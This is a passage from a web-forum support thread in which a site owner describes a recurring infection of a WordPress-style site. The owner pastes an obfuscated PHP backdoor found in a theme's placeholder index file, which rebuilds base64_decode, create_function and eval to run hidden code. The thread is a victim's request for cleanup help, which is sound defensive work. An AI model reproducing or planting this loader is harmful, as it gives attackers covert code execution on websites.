Tony S

Forum Replies Created

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • in reply to: Output Buffers #1025

    Tony S
    Member

    I was able to narrow it down to the theme still being infected…

    Found this in an index.html file that should have been a //silence is golden…

     

    <code>function  RxMe258j7ipNk($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} function  FFq70nBpCepT0cn7H($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} function  bAZaPFs4rcjfP($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} $PsiKcj = ‘bpvR3tuMoPapvR3tuMoPspvR3tuMoPepvR3tuMoP6pvR3tuMoP4pvR3tuMoP_pvR3tuMoPdpvR3tuMoPepvR3tuMoPcpvR3tuMoPopvR3tuMoPdpvR3tuMoPe’; $PsiKcj = bAZaPFs4rcjfP(‘pvR3tuMoP’,”,$PsiKcj); $X7qo07j8PzkRGXSb6S = ‘cuWToYN2EZoruWToYN2EZoeuWToYN2EZoauWToYN2EZotuWToYN2EZoeuWToYN2EZo_uWToYN2EZofuWToYN2EZouuWToYN2EZonuWToYN2EZocuWToYN2EZotuWToYN2EZoiuWToYN2EZoouWToYN2EZon’; $X7qo07j8PzkRGXSb6S = bAZaPFs4rcjfP(‘uWToYN2EZo’,”,$X7qo07j8PzkRGXSb6S); $IVV95C = ‘A6DyoM9rVXEheA6DyoM9rVXEhvA6DyoM9rVXEhaA6DyoM9rVXEhl’; $IVV95C = bAZaPFs4rcjfP(‘A6DyoM9rVXEh’,”,$IVV95C); $YrRosvlJKcGUbmkl4Q = ‘$aja4icZ4kQPRYcL’; $eS5vP9gB9c4OPmv4ER = $X7qo07j8PzkRGXSb6S($YrRosvlJKcGUbmkl4Q,$IVV95C.’(‘.$PsiKcj.’(‘.$YrRosvlJKcGUbmkl4Q.’));’); $eS5vP9gB9c4OPmv4ER(‘’);</code>

    in reply to: Output Buffers #1024

    Tony S
    Member

    Any luck with the info I passed along? Appreciate the help sir!

    in reply to: Output Buffers #1023

    Tony S
    Member

    Thanks Eli. I have created you an account and you should get an automatic email with the credentials. I will email you additionally from another email account as well.

    Tony

    in reply to: Output Buffers #1021

    Tony S
    Member

    This one is affecting me as well.

     

    Another Plugin or Theme is using ‘ZM5j2q0shf_callback’ to handle output buffers. This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins. Consider disabling caching and compression plugins (at least during the scanning process).

     

    I thought I had cleaned the site out a few weeks back, things have been great… recently though I found the site to be sluggish and noticed new code injection and EVAL’s back on some html files etc… I’ve run through scans, done some cleaning… but I’m still seeing the message above. I’ve been unable to locate the malicious code… Any tips on where/how I would be able to locate/narrow down the location?

    Thanks

Viewing 4 posts - 1 through 4 (of 4 total)